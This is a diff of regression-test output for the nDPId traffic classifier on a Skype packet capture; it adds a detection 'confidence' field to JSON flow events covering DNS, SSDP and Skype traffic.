 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1431969723979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969723979,"pkt":"0NQSxnP1PBXCt3IOCABFAABLuaAAAEARPY7AqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyr4AAEARLHvAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAk9AAAEARY2nAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969724570,"flow_last_seen":1431969724570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969724570,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -995,12 +994,12 @@
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431969728511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1431969728511,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIsLcAAEARRULAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":180000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01103{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1431969728749,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"ts_msec":1431969728749,"pkt":"AQBef\/\/6xCwDBkn+CABFAAIPEXQAAAER9GvAqAFc7\/\/\/+sOkB2wB+wkMTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xMC4yMTEuNTUuMzoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmNiYzc4NWUtMjVmNC00MGNhLTk4YjUtMGQ1ODA0YWRhYThlDQpVU046dXVpZDoyY2JjNzg1ZS0yNWY0LTQwY2EtOThiNS0wZDU4MDRhZGFhOGU6OnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KQ2FjaGUtQ29udHJvbDptYXgtYWdlPTkwMA0KU2VydmVyOk1pY3Jvc29mdC1XaW5kb3dzLU5ULzUuMSBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOmQ0NmQ1MDA5ZTE0NzFiYTY4MDBlNDNlN2YwZTEyZWU0DQoNCg=="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":180000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":180000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2461,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":1431969728750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":539,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":539,"pkt_l4_len":505,"ts_msec":1431969728750,"pkt":"AQBef\/\/6xCwDBkn+CABFAAIN8CkAAAERFbjAqAFc7\/\/\/+sOkB2wB+afnTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29udGVudERpcmVjdG9yeToxDQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzEwLjIxMS41NS4zOjI4NjkvdXBucGhvc3QvdWRoaXNhcGkuZGxsP2NvbnRlbnQ9dXVpZDoyY2JjNzg1ZS0yNWY0LTQwY2EtOThiNS0wZDU4MDRhZGFhOGUNClVTTjp1dWlkOjJjYmM3ODVlLTI1ZjQtNDBjYS05OGI1LTBkNTgwNGFkYWE4ZTo6dXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpDb250ZW50RGlyZWN0b3J5OjENCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy1OVC81LjEgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzpkNDZkNTAwOWUxNDcxYmE2ODAwZTQzZTdmMGUxMmVlNA0KDQo="}
 01016{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2462,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":1431969728750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":475,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":475,"pkt_l4_len":441,"ts_msec":1431969728750,"pkt":"AQBef\/\/6xCwDBkn+CABFAAHN3wIAAAERJx\/AqAFc7\/\/\/+sOkB2wBuX63Tk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVwbnA6cm9vdGRldmljZQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xMC4yMTEuNTUuMzoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmNiYzc4NWUtMjVmNC00MGNhLTk4YjUtMGQ1ODA0YWRhYThlDQpVU046dXVpZDoyY2JjNzg1ZS0yNWY0LTQwY2EtOThiNS0wZDU4MDRhZGFhOGU6OnVwbnA6cm9vdGRldmljZQ0KQ2FjaGUtQ29udHJvbDptYXgtYWdlPTkwMA0KU2VydmVyOk1pY3Jvc29mdC1XaW5kb3dzLU5ULzUuMSBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOmQ0NmQ1MDA5ZTE0NzFiYTY4MDBlNDNlN2YwZTEyZWU0DQoNCg=="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1431969735255,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431969735255,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQGgAAEARFBbAqAEiarz5ujLdOxAAGjrunqMCSv26L3gQtCJn9dl5F8Bv"}
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642247,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1008,24 +1007,24 @@
 00573{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969641948,"flow_last_seen":1431969668369,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643972,"flow_last_seen":1431969670410,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431969642087,"flow_last_seen":1431969695591,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1431969648258,"flow_last_seen":1431969728408,"flow_idle_time":180000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":15234,"flow_avg_l4_payload_len":331,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00677{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1431969648258,"flow_last_seen":1431969728408,"flow_idle_time":180000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":15234,"flow_avg_l4_payload_len":331,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00652{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00678{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642969,"flow_last_seen":1431969723490,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969643971,"flow_last_seen":1431969670410,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642244,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00644{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2553,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969741202,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2580,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715510,"flow_last_seen":1431969745372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2872,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1431969745372,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACh3hQAAAERKXPAqAEi7\/\/\/+t42B2wAjVUWTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="}
